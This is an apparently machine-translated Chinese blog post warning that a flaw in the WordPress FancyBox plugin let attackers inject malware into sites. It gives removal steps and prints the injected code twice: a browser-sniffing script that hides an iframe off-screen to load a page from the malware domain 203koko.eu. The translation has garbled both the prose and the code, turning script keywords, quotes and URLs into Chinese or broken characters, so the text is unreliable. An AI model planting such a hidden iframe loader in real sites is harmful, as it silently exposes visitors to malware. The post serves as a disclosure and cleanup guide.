[惡意軟件的iframe 203koko]惡意軟件感染的WordPress網站

本週早些時候一些網站和博客 WordPress,已收到警告 惡意軟件感染 通過 谷歌的管理者.

問題向其中 谷歌的管理者 稱為是一個存在 鱈魚 / 腳本 iframe惡意軟件 來源網站。

<SCRIPT>如果(navigator.userAgent.match(/ MSIE / I)){文件撰寫('<DIV風格=“位置:絕對;左:-2000px;寬度:2000px”> <IFRAME SRC =“HTTP:/ /203koko.eu/hjnfh/ipframe2.php“寬度=”20“HEIGHT =”30“> </ IFRAME> </ DIV>'); } </ SCRIPT>

看來,這是一個 漏洞 a 插入acquis 的fancybox的WordPress 它直到昨天(05.02.2015)尚未更新,很長一段時間。
解決這個問題,並 消毒病毒網站 有了這個惡意軟件,相對簡單。
1。 禁用FancyBox插件。
2。 從服務器上刪除所有的FancyBox插件文件(通過FTP)
3。 安裝新版本的插件(的fancybox 3.0.4)

的fancybox為WordPress 3.0.4

- 重命名受3.0.3中提到的安全問題影響的設置。 這應該可以阻止惡意代碼出現在更新插件的網站上,而無需刪除惡意代碼。

的fancybox為WordPress 3.0.3

- 修正了一個安全問題.

惡意軟件信息:

TYPE:Iframe的重定向
TARGET:WordPress的的fancybox
惡意軟件DOMAIN:203koko.eu
惡意軟件網址:http://203koko.eu/hjnfh/ipframe2.php
RAW惡意軟件代碼:<IFRAME SRC =“htt​​p://203koko.eu/hjnfh/ipframe2.php”WIDTH =“20”高度=“30”> </ IFRAME>
惡意軟件SCRIPT:<SCRIPT>如果(navigator.userAgent.match(/ MSIE / I)){文件撰寫(“<DIV的風格=”的位置是:絕對的;左:-2000px;寬度:2000px“>

從你的WordPress網站上刪除的惡意軟件.

[惡意軟件的iframe 203koko]惡意軟件感染的WordPress網站

關於作者

隱形LP

創始人兼編輯 隱身設置在2006日期。
具有Linux操作系統(尤其是CentOS),Mac OS X, Windows XP> Windows 10和WordPress(CMS)。

發表評論